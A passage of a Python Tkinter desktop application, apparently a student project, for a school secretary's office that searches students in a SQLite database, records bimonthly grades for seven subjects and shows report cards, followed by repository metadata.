font=SMALL_FONT)\n\t\t\tself.alunos.place(x=180,y=230)\n\t\t\t\n\t\t\tself.serielabel = tk.Label(self, text = \"Série\", font=LARGE_FONT)\n\t\t\tself.serielabel.place(x=470, y=200)\n\t\t\t\t\n\t\t\tself.serie = tk.Label(self, font=SMALL_FONT)\n\t\t\tself.serie.place(x=500,y=230)\n\t\t\n\t\t\tself.turnolabel = tk.Label(self, text = \"Turno\", font=LARGE_FONT)\n\t\t\tself.turnolabel.place(x=550, y=200)\n\t\t\n\t\t\tself.turno = tk.Label(self, font=SMALL_FONT)\n\t\t\tself.turno.place(x=550,y=230)\n\t\t\n\n\t\t\tconnection = sqlite3.connect('alunos.db')\n\t\t\tc = connection.cursor()\n\n\t\t\tnome = self.aluno.get().upper()\n\n\t\t\tc.execute('SELECT id,nome,serie,turno FROM alunos WHERE nome LIKE ?', [('%'+nome+'%')])\n\n\t\t\tself.lista = c.fetchall()\t\t\t\n\t\t\tself.mat = tk.IntVar()\n\t\t\tself.mat.set(0)\n\n\t\t\tmatricula=\"\"\n\t\t\talunos=\"\"\n\t\t\tserie= \"\"\n\t\t\tturno= \"\"\n\n\t\t\tself.buttons = []\n\t\t\t\n\t\t\tfor i in range(len(self.lista)):\n\n\t\t\t\tpos_x=10\n\t\t\t\tpos_y=230+17*i\n\t\t\n\n\t\t\t\t\n\t\t\t\tmatricula = matricula+str(self.lista[i][0])+'\\n'\n\t\t\t\talunos = alunos+self.lista[i][1]+'\\n'\n\t\t\n\t\n\t\t\t\tserie = serie+str(self.lista[i][2])+ '\\n'\n\t\t\t\tturno = turno+self.lista[i][3]+'\\n'\n\t\t\n\t\t\t\tself.buttons.append(tk.Radiobutton(self, value=self.lista[i][0],state=\"active\", variable=self.mat))\n\t\t\t\tself.buttons[i].place(x=pos_x, y=pos_y)\n\n\n\n\t\n\t\t\tself.boletim = tk.Button(self,text=\"Inserir Notas\", font=SMALL_FONT, command=lambda: editarboletim(self, parent))\n\t\t\tself.boletim.place(x=200, y=pos_y+34)\n\t\t\t\n\t\t\n\n\t\t\tself.inserir = tk.Button(self,text=\"Boletim\", font=SMALL_FONT,command = lambda: visualizar(self))\n\t\t\tself.inserir.place(x=350, y=pos_y+34)\n\t\t\n\t\t\n\t\t\tself.matricula[\"text\"] = matricula[0:len(matricula)-1]\n\t\t\tself.alunos[\"text\"] = alunos[0:len(alunos)-1]\n\t\t\tself.serie[\"text\"] = serie[0:len(serie)-1]\n\t\t\tself.turno[\"text\"] = turno[0:len(turno)-1]\n\n\n\t\t\t\n\t\tdef camposvazios():\n\n\t\t\t\tpopup = tk.Tk()\n\t\t\t\tpopup.title(\"Campos Vazios!\")\n\t\t\t\tlabel = tk.Label(popup, text=\"Por favor, selecione um aluno antes de continuar!\")\n\t\t\t\tlabel.grid(row=\"1\",column=\"1\", columnspan=\"2\")\n\t\t\t\tB1 = tk.Button(popup, text=\"Ok\", command=lambda: popup.destroy())\n\t\t\t\tB1.grid(row=\"2\",column=\"1\", sticky=\"e\")\n\n\t\n\n\t\tdef editarboletim(self, parent):\n\n\n\t\t\tif self.mat.get() == 0:\n\n\t\t\t\tcamposvazios()\n\t\n\t\t\telse:\n\n\t\t\t\t\n\t\t\t\tself.label1[\"text\"] = \"Inserir Notas\"\n\t\t\t\tself.nomelabel[\"text\"] = \"Aluno:\"\n\t\t\t\tself.nomelabel[\"font\"] = LARGE_FONT\n\t\t\t\tself.aluno.destroy()\n\t\t\t\tself.botao1.destroy()\n\t\t\t\tself.botao2.destroy()\n\t\t\t\tself.matriculalabel.destroy()\n\t\t\t\tself.alunoslabel.destroy()\n\t\t\t\tself.serielabel.destroy()\n\t\t\t\tself.turnolabel.destroy()\n\t\t\t\tself.matricula.destroy()\n\t\t\t\tself.alunos.destroy()\n\t\t\t\tself.serie.destroy()\n\t\t\t\tself.turno.destroy()\n\t\n\t\t\t\tfor i in range(len(self.lista)):\n\t\t\t\t\tself.buttons[i].destroy()\n\n\t\t\t\tself.inserir.destroy()\n\t\t\t\tself.boletim.destroy()\n\t\n\n\t\n\t\t\t\tconnection = sqlite3.connect('alunos.db')\n\t\t\t\tc = connection.cursor()\n\n\t\t\t\tc.execute('SELECT nome,serie,turno FROM alunos WHERE id = ?', [(self.mat.get())])\n\t\n\t\t\t\taluno = c.fetchall()\n\n\n\t\t\t\tself.aluno = tk.Label(self, fg = 'black', font = LARGE_FONT, text=aluno[0][0])\n\t\t\t\tself.aluno.place(x=120, y=110)\n\n\t\t\t\tself.serielabel = tk.Label(self, text = \"Série:\", font=LARGE_FONT)\n\t\t\t\tself.serielabel.place(x=500, y=110)\n\n\t\t\t\tself.serie = tk.Label(self, font=LARGE_FONT, text = aluno[0][1])\n\t\t\t\tself.serie.place(x=570,y=110)\n\n\t\t\t\n\t\t\t\tself.turno = tk.Label(self, font=LARGE_FONT, text=aluno[0][2])\n\t\t\t\tself.turno.place(x=600,y=110)\n\t\t\t\t\n\n\t\t\t\tself.bim = tk.IntVar()\n\t\t\t\tself.bim.set(0)\n\n\t\t\t\tself.bimestrelabel = tk.Label(self, text = \"Bimestre:\", font=SMALL_FONT)\n\t\t\t\tself.bimestrelabel.place(x=250, y=140)\n\t\n\n\t\t\t\tself.radio = []\n\n\t\t\t\tfor i in range(4):\n\t\t\t\t\n\t\t\t\t\tpos_x = (350+i*50)\n\t\t\t\t\t\n\t\t\t\t\tself.radio.append(tk.Radiobutton(self, value=i+1,state=\"active\", variable=self.bim, text=i+1))\n\t\t\t\t\tself.radio[i].place(x=pos_x, y=140)\n\n\t\t\t\t\n\t\t\t\tself.labels = []\n\t\t\t\tself.entradas = []\n\n\t\t\t\tAUXILIAR = [(\"Português:\",0), (\"Matemática:\",1), (\"Geografia:\",2), (\"História:\",3), (\"Biologia:\",4), (\"Física:\",5), (\"Química:\",6)]\n\n\t\t\t\tfor disciplina, indices in AUXILIAR :\n\t\t\t\t\n\t\t\t\t\tpos_y = (190+indices*20)\t\t\t\t\n\t\t\t\t\n\n\t\t\t\t\tself.labels.append(tk.Label(self, text = disciplina, font=SMALL_FONT))\n\t\t\t\t\tself.labels[indices].place(x=300, y=pos_y)\n\t\t\t\t\tself.entradas.append(tk.Entry(self, font=SMALL_FONT, width = 5))\n\t\t\t\t\tself.entradas[indices].place(x=400, y=pos_y)\n\t\t\t\n\t\t\t\n\t\t\t\tself.botaoenviar = tk.Button(self,text=\"Enviar\", font=SMALL_FONT,command = lambda: enviarnotas(self))\n\t\t\t\tself.botaoenviar.place(x=300, y=330)\n\n\t\t\t\tself.botaovoltar = tk.Button(self,text=\"Voltar\", font=SMALL_FONT,command = lambda: voltarnotas(self, parent))\n\t\t\t\tself.botaovoltar.place(x=500, y=330)\n\n\t\tdef voltarnotas(self, parent):\n\n\t\t\tself.mat.set(0)\n\t\t\tself.bim.set(0)\n\n\t\t\tfor i in range(7):\n\n\t\t\t\tself.labels[i].destroy()\n\t\t\t\tself.entradas[i].destroy()\n\n\t\t\tfor i in range(4):\n\t\t\t\t\n\t\t\t\tself.radio[i].destroy()\n\n\n\t\t\tself.botaovoltar.destroy()\n\t\t\tself.botaoenviar.destroy()\n\t\t\tself.bimestrelabel.destroy()\n\t\t\tself.aluno.destroy()\n\t\t\tself.serielabel.destroy()\n\t\t\tself.serie.destroy()\n\t\t\tself.turno.destroy()\n\t\t\tself.label1.destroy()\n\n\t\t\tself.label1 = tk.Label(self, text=\"Buscar Aluno\", font=TITLE_FONT, height = 3, width = 50)\n\t\t\tself.label1.place(x=20, y=50)\n\n\n\t\t\tself.nomelabel = tk.Label(self, text=\"Nome do aluno:\", font=SMALL_FONT)\n\t\t\tself.nomelabel.place(x=50, y=110)\n\n\n\t\t\tself.aluno = tk.Entry(self, width=40, font=SMALL_FONT)\n\t\t\tself.aluno.place(x=180, y=110)\n\n\n\n\t\t\tself.botao1 = tk.Button(self, text=\"Buscar\",fg = 'black', font=SMALL_FONT,command=lambda: buscar(self))\n\t\t\tself.botao1.place(x=250,y=150)\n\n\n\n\t\t\tself.botao2 = tk.Button(self, text = 'Voltar', fg = 'black', font = SMALL_FONT,command=lambda: parent.show_frame(PaginaInicial))\n\t\t\tself.botao2.place(x=350, y=150)\n\n\n\n\n\t\t\tparent.show_frame(PaginaInicial)\n\n\n\n\t\tdef enviarnotas(self):\n\n\t\t\tnotas = []\n\n\t\t\tfor i in range(7):\n\t\t\n\t\t\t\tnotas.append(float(self.entradas[i].get()))\t\n\n\t\t\tboletim_id = int(str(self.mat.get())+str(self.bim.get()))\n\n\t\t\tnotas.append(boletim_id)\n\t\t\ti = 0\n\t\t\taux = 0\n\n\t\t\tif self.bim.get() == 0:\n\t\t\n\t\t\t\tescolhabimestre(self)\n\t\t\n\t\t\telse:\n\n\t\t\t\twhile i <= 6:\n\n\t\t\t\t\tif notas[i] < 0 or notas[i] > 10:\n\t\t\t\t\t\tnotainvalida(self)\n\t\t\t\t\t\taux += 1\n\t\t\t\t\t\tbreak\n\t\t\t\t\ti += 1\n\n\t\t\t\tif aux == 0:\n\n\t\t\t\t\tconnection = sqlite3.connect('alunos.db')\n\t\t\t\t\tc = connection.cursor()\n\n\t\t\t\t\tc.execute('UPDATE boletim SET port = ?, mat = ?, geo = ?, hist = ?, bio = ?, fis = ?, qui = ? WHERE boletim_id = ?', notas)\n\n\n\t\t\t\t\tconnection.commit()\n\t\t\t\t\tconnection.close()\n\n\t\t\t\t\tnotasenviadas(self,parent )\n\n\n\n\n\t\tdef escolhabimestre(self):\n\n\t\t\tpopup = tk.Tk()\n\t\t\tpopup.title(\"Bimestre inválido!\")\n\t\t\tlabel = tk.Label(popup, text=\"Por favor, escolha em qual bimestre você deseja inserir as notas!\")\n\t\t\tlabel.grid(row=\"1\",column=\"1\", columnspan=\"2\")\n\t\t\tB1 = tk.Button(popup, text=\"Ok\", command=lambda: popup.destroy())\n\t\t\tB1.grid(row=\"2\",column=\"1\", sticky=\"e\")\n\n\n\t\tdef notainvalida(self):\n\n\t\t\tpopup = tk.Tk()\n\t\t\tpopup.title(\"Nota inválida!\")\n\t\t\tlabel = tk.Label(popup, text=\"Por favor, verifique as notas antes de enviar!\")\n\t\t\tlabel.grid(row=\"1\",column=\"1\", columnspan=\"2\")\n\t\t\tB1 = tk.Button(popup, text=\"Ok\", command=lambda: popup.destroy())\n\t\t\tB1.grid(row=\"2\",column=\"1\", sticky=\"e\")\n\n\t\tdef notasenviadas(self, parent):\n\n\t\t\tself.popup = tk.Tk()\n\t\t\tself.popup.title(\"Notas enviadas com sucesso!\")\n\t\t\tself.label = tk.Label(self.popup, text=\"As notas do aluno foram enviadas com sucesso!\", width = 40)\n\t\t\tself.label.grid(row=\"1\",column=\"1\", columnspan=\"2\")\n\t\t\tself.B1 = tk.Button(self.popup, text=\"OK\", command=lambda: fechapopup(self, parent))\n\t\t\tself.B1.grid(row=\"2\",column=\"1\", sticky=\"e\")\n\n\t\tdef fechapopup(self, parent):\n\n\t\t\tself.mat.set(0)\n\t\t\tself.bim.set(0)\n\n\t\t\tfor i in range(7):\n\n\t\t\t\tself.labels[i].destroy()\n\t\t\t\tself.entradas[i].destroy()\n\n\t\t\tfor i in range(4):\n\t\t\t\t\n\t\t\t\tself.radio[i].destroy()\n\n\n\t\t\tself.botaovoltar.destroy()\n\t\t\tself.botaoenviar.destroy()\n\t\t\tself.bimestrelabel.destroy()\n\t\t\tself.aluno.destroy()\n\t\t\tself.serielabel.destroy()\n\t\t\tself.serie.destroy()\n\t\t\tself.turno.destroy()\n\t\t\tself.label1.destroy()\n\n\t\t\tself.label1 = tk.Label(self, text=\"Buscar Aluno\", font=TITLE_FONT, height = 3, width = 50)\n\t\t\tself.label1.place(x=20, y=50)\n\n\n\t\t\tself.nomelabel = tk.Label(self, text=\"Nome do aluno:\", font=SMALL_FONT)\n\t\t\tself.nomelabel.place(x=50, y=110)\n\n\n\t\t\tself.aluno = tk.Entry(self, width=40, font=SMALL_FONT)\n\t\t\tself.aluno.place(x=180, y=110)\n\n\n\n\t\t\tself.botao1 = tk.Button(self, text=\"Buscar\",fg = 'black', font=SMALL_FONT,command=lambda: buscar(self))\n\t\t\tself.botao1.place(x=250,y=150)\n\n\n\n\t\t\tself.botao2 = tk.Button(self, text = 'Voltar', fg = 'black', font = SMALL_FONT,command=lambda: parent.show_frame(PaginaInicial))\n\t\t\tself.botao2.place(x=350, y=150)\n\n\n\n\n\t\t\tparent.show_frame(PaginaInicial)\n\t\t\tself.popup.destroy()\n\n\n\t\tdef visualizar(self):\n\n\n\t\t\tif self.mat.get() == 0:\n\n\t\t\t\tcamposvazios()\n\t\n\t\t\telse:\n\n\t\t\t\t\n\t\t\t\tself.label1[\"text\"] = \"Boletim\"\n\t\t\t\tself.nomelabel[\"text\"] = \"Aluno:\"\n\t\t\t\tself.nomelabel[\"font\"] = LARGE_FONT\n\t\t\t\tself.aluno.destroy()\n\t\t\t\tself.botao1.destroy()\n\t\t\t\tself.botao2.destroy()\n\t\t\t\tself.matriculalabel.destroy()\n\t\t\t\tself.alunoslabel.destroy()\n\t\t\t\tself.serielabel.destroy()\n\t\t\t\tself.turnolabel.destroy()\n\t\t\t\tself.matricula.destroy()\n\t\t\t\tself.alunos.destroy()\n\t\t\t\tself.serie.destroy()\n\t\t\t\tself.turno.destroy()\n\n\t\t\t\tfor i in range(len(self.lista)):\n\t\t\t\t\tself.buttons[i].destroy()\n\n\t\t\t\tself.inserir.destroy()\n\t\t\t\tself.boletim.destroy()\n\n\t\t\t\tself.notas = []\n\n\t\t\t\tconnection = sqlite3.connect('alunos.db')\n\t\t\t\tc = connection.cursor()\n\n\t\t\t\tc.execute('SELECT nome,serie,turno FROM alunos WHERE id = ?', [(self.mat.get())])\n\t\n\t\t\t\taluno = c.fetchall()\n\t\t\t\n\t\t\t\tc.execute('SELECT port,mat,geo,hist, bio, fis, qui FROM boletim WHERE boletim_id = ?', [(int(str(self.mat.get())+\"1\"))])\n\n\t\t\t\tself.notas.append(c.fetchall())\n\t\t\t\t\n\t\t\t\tc.execute('SELECT port,mat,geo,hist, bio, fis, qui FROM boletim WHERE boletim_id = ?', [(int(str(self.mat.get())+\"2\"))])\n\n\t\t\t\tself.notas.append(c.fetchall())\n\n\t\t\t\tc.execute('SELECT port,mat,geo,hist, bio, fis, qui FROM boletim WHERE boletim_id = ?', [(int(str(self.mat.get())+\"3\"))])\n\n\t\t\t\tself.notas.append(c.fetchall())\n\n\t\t\t\tc.execute('SELECT port,mat,geo,hist, bio, fis, qui FROM boletim WHERE boletim_id = ?', [(int(str(self.mat.get())+\"4\"))])\n\n\t\t\t\tself.notas.append(c.fetchall())\n\n\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tself.aluno = tk.Label(self, fg = 'black', font = LARGE_FONT, text=aluno[0][0])\n\t\t\t\tself.aluno.place(x=120, y=110)\n\n\t\t\t\tself.serielabel = tk.Label(self, text = \"Série:\", font=LARGE_FONT)\n\t\t\t\tself.serielabel.place(x=500, y=110)\n\n\t\t\t\tself.serie = tk.Label(self, font=LARGE_FONT, text = aluno[0][1])\n\t\t\t\tself.serie.place(x=570,y=110)\n\n\t\t\t\tself.turno = tk.Label(self, font=LARGE_FONT, text=aluno[0][2])\n\t\t\t\tself.turno.place(x=600,y=110)\n\t\t\t\t\n\t\t\t\tself.labels = []\n\t\t\t\tself.bim = []\n\n\t\t\t\tDISCIPLINAS = [(\"Português:\",0), (\"Matemática:\",1), (\"Geografia:\",2), (\"História:\",3), (\"Biologia:\",4), (\"Física:\",5), (\"Química:\",6)]\n\t\t\t\tBIMESTRES = [(\"1 Bimestre\", 0), (\"2 Bimestre\", 1), (\"3 Bimestre\", 2), (\"4 Bimestre\", 3)]\n\t\t\t\t\n\n\t\t\t\tfor disciplina, indices in DISCIPLINAS:\n\t\t\t\t\n\t\t\t\t\tpos_y = (190+indices*20)\t\t\t\t\n\t\t\t\t\n\n\t\t\t\t\tself.labels.append(tk.Label(self, text = disciplina, font=SMALL_FONT))\n\t\t\t\t\tself.labels[indices].place(x=100, y=pos_y)\n\n\t\t\t\tfor bimestre, indices in BIMESTRES:\n\n\t\t\t\t\tpos_x = (200+indices*100)\n\n\t\t\t\t\tself.bim.append(tk.Label(self, text = bimestre, font=SMALL_FONT))\n\t\t\t\t\tself.bim[indices].place(x=pos_x, y=150)\n\n\t\n\t\t\t\tself.boletim = [[],[],[],[]]\n\t\t\t\n\t\t\t\tfor i in range(4):\n\t\t\t\t\tfor j in range(7):\n\t\t\t\t\n\t\t\t\t\t\tpos_x = (240+i*100)\n\t\t\t\t\t\tpos_y = (190+j*20)\n\n\t\t\t\t\t\tself.boletim[i].append(tk.Label(self, text = self.notas[i][0][j], font=SMALL_FONT))\n\t\t\t\t\t\tself.boletim[i][j].place(x= pos_x, y= pos_y)\n\n\n\t\t\t\tself.botaovoltar = tk.Button(self, text = 'Voltar', fg = 'black',command=lambda: voltarboletim(self, parent))\n\t\t\t\tself.botaovoltar.place(x=50, y=50)\n\n\n\t\tdef voltarboletim(self, parent):\n\n\t\t\tself.mat.set(0)\n\n\t\t\tfor i in range(4):\n\t\t\t\tfor j in range(7):\n\t\t\t\t\tself.boletim[i][j].destroy()\n\t\t\n\t\t\t\n\t\t\tfor i in range(4):\n\t\t\t\tself.bim[i].destroy()\n\n\n\t\t\tfor i in range(7):\n\n\t\t\t\tself.labels[i].destroy()\n\n\n\n\t\t\tself.botaovoltar.destroy()\n\t\t\tself.aluno.destroy()\n\t\t\tself.serielabel.destroy()\n\t\t\tself.serie.destroy()\n\t\t\tself.turno.destroy()\n\t\t\tself.label1.destroy()\n\n\t\t\tself.label1 = tk.Label(self, text=\"Buscar Aluno\", font=TITLE_FONT, height = 3, width = 50)\n\t\t\tself.label1.place(x=20, y=50)\n\n\n\t\t\tself.nomelabel = tk.Label(self, text=\"Nome do aluno:\", font=SMALL_FONT)\n\t\t\tself.nomelabel.place(x=50, y=110)\n\n\n\t\t\tself.aluno = tk.Entry(self, width=40, font=SMALL_FONT)\n\t\t\tself.aluno.place(x=180, y=110)\n\n\n\n\t\t\tself.botao1 = tk.Button(self, text=\"Buscar\",fg = 'black', font=SMALL_FONT,command=lambda: buscar(self))\n\t\t\tself.botao1.place(x=250,y=150)\n\n\n\n\t\t\tself.botao2 = tk.Button(self, text = 'Voltar', fg = 'black', font = SMALL_FONT,command=lambda: parent.show_frame(PaginaInicial))\n\t\t\tself.botao2.place(x=350, y=150)\n\n\n\n\n\t\t\tparent.show_frame(PaginaInicial)\n\n\n\nclass TodosAlunos(tk.Frame):\n\n\n\tdef __init__(self, parent, controller):\n\t\ttk.Frame.__init__(self, parent)\n\n\n\t\tself.label = tk.Label(self, text = 'Colégio Escolha Certa', fg = 'black', font = TITLE_FONT, height = 3, width = 50)\n\t\tself.label.place(x=20, y=0)\n\n\n\t\tself.label1 = tk.Label(self, text=\"Alunos\", font=TITLE_FONT, height = 3, width = 50)\n\t\tself.label1.place(x=20, y=50)\n\n\t\tself.botao1 = tk.Button(self, text = 'Buscar', fg = 'black', font = SMALL_FONT,command=lambda: buscar(self))\n\t\tself.botao1.place(x=200, y=350)\n\n\n\t\tself.botao2 = tk.Button(self, text = 'Voltar', fg = 'black', font = SMALL_FONT,command=lambda: voltar(self, parent))\n\t\tself.botao2.place(x=300, y=350)\n\n\t\tself.scrollbar = tk.Scrollbar(self)\n\t\tself.listbox = tk.Listbox(self, width=60, yscrollcommand=self.scrollbar.set)\n\n\t\tself.listbox.place(x=50,y=150)\n\t\t\n\t\tself.scrollbar.place(x=540, y=150, height = 160)\n\n\n\n\n\n\t\tdef buscar(self):\n\t\t\n\t\t\tconnection = sqlite3.connect('alunos.db')\n\t\t\tc = connection.cursor()\n\n\n\t\t\tc.execute('SELECT id,nome,responsavel,serie,turno FROM alunos')\n\t\n\t\t\tself.lista = c.fetchall()\n\n\t\t\tfor i in range(len(self.lista)):\n\n\t\t\t\tself.listbox.insert(\"end\", str(self.lista[i][0])+\" \"+self.lista[i][1]+\" \"+self.lista[i][2]+\" \"+str(self.lista[i][3])+\" \"+self.lista[i][4])\n\n\t\t\tself.scrollbar.config(command=self.listbox.yview)\n\n\t\t\tconnection.close()\n\n\t\t\n\t\tdef voltar(self, parent):\n\n\t\t\tfor i in range(len(self.lista)):\n\n\t\t\t\tself.listbox.delete(0, \"end\")\n\t\t\t\tparent.show_frame(PaginaInicial)\n\n\n\napp = SecretariaApp()\napp.mainloop()\n\n\n", "repo_name": "adbys/ProjetoP1", "sub_path": "sistema.py", "file_name": "sistema.py", "file_ext": "py", "file_size_in_byte": 30095, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "Tkinter.Tk", "line_number": 26, "usage_type": "attribute"}, {"api_name": "Tkinter.Tk.__init__", "line_number": 31, "usage_type": "call"}, {"api_name": "Tkinter.Tk", "line_number": 31, "usage_type": "attribute"}, {"api_name": "Tkinter.Tk.wm_title", "line_number": 32, "usage_type": "call"}, {"api_name": "Tkinter.Tk", "line_number": 32, "usage_type": "attribute"}, {"api_name": "Tkinter.Frame", "line_number": 35, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 63, "usage_type": "attribute"}, {"api_name": "Tkinter.Frame.__init__", "line_number": 66, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 66, "usage_type": "attribute"}, {"api_name": "Tkinter.Label", "line_number": 73, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 77, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 80, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 84, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 89, "usage_type": "attribute"}, {"api_name": "Tkinter.Frame.__init__", "line_number": 92, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 92, "usage_type": "attribute"}, {"api_name": "Tkinter.Label", "line_number": 97, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 101, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 106, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 109, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 112, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 121, "usage_type": "attribute"}, {"api_name": "Tkinter.Frame.__init__", "line_number": 124, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 124, "usage_type": "attribute"}, {"api_name": "Tkinter.Label", "line_number": 127, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 130, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 133, "usage_type": "call"}, {"api_name": "Tkinter.IntVar", "line_number": 137, "usage_type": "call"}, {"api_name": "Tkinter.StringVar", "line_number": 139, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 145, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 148, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 156, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 165, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 168, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 172, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 175, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 203, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 206, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 210, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 213, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 216, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 219, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 223, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 226, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 229, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 252, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 272, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 275, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 278, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 287, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 296, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 299, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 303, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 306, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 317, "usage_type": "attribute"}, {"api_name": "Tkinter.Frame.__init__", "line_number": 321, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 321, "usage_type": "attribute"}, {"api_name": "Tkinter.IntVar", "line_number": 326, "usage_type": "call"}, {"api_name": "Tkinter.StringVar", "line_number": 328, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 331, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 334, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 337, "usage_type": "call"}, {"api_name": "Tkinter.Entry", "line_number": 340, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 343, "usage_type": "call"}, {"api_name": "Tkinter.Entry", "line_number": 346, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 350, "usage_type": "call"}, {"api_name": "Tkinter.Entry", "line_number": 352, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 355, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 358, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 361, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 363, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 366, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 368, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 370, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 374, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 378, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 381, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 411, "usage_type": "call"}, {"api_name": "Tkinter.Tk", "line_number": 463, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 465, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 467, "usage_type": "call"}, {"api_name": "Tkinter.Tk", "line_number": 472, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 474, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 476, "usage_type": "call"}, {"api_name": "Tkinter.Tk", "line_number": 481, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 483, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 485, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 487, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 493, "usage_type": "attribute"}, {"api_name": "Tkinter.Frame.__init__", "line_number": 496, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 496, "usage_type": "attribute"}, {"api_name": "Tkinter.Label", "line_number": 499, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 503, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 507, "usage_type": "call"}, {"api_name": "Tkinter.Entry", "line_number": 511, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 516, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 521, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 538, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 544, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 548, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 551, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 554, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 557, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 560, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 563, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 567, "usage_type": "call"}, {"api_name": "Tkinter.IntVar", "line_number": 575, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 599, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 605, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 610, "usage_type": "call"}, {"api_name": "Tkinter.Tk", "line_number": 623, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 625, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 627, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 665, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 673, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 676, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 679, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 683, "usage_type": "call"}, {"api_name": "Tkinter.IntVar", "line_number": 687, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 690, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 700, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 714, "usage_type": "call"}, {"api_name": "Tkinter.Entry", "line_number": 716, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 720, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 723, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 750, "usage_type": "call"}, {"api_name": 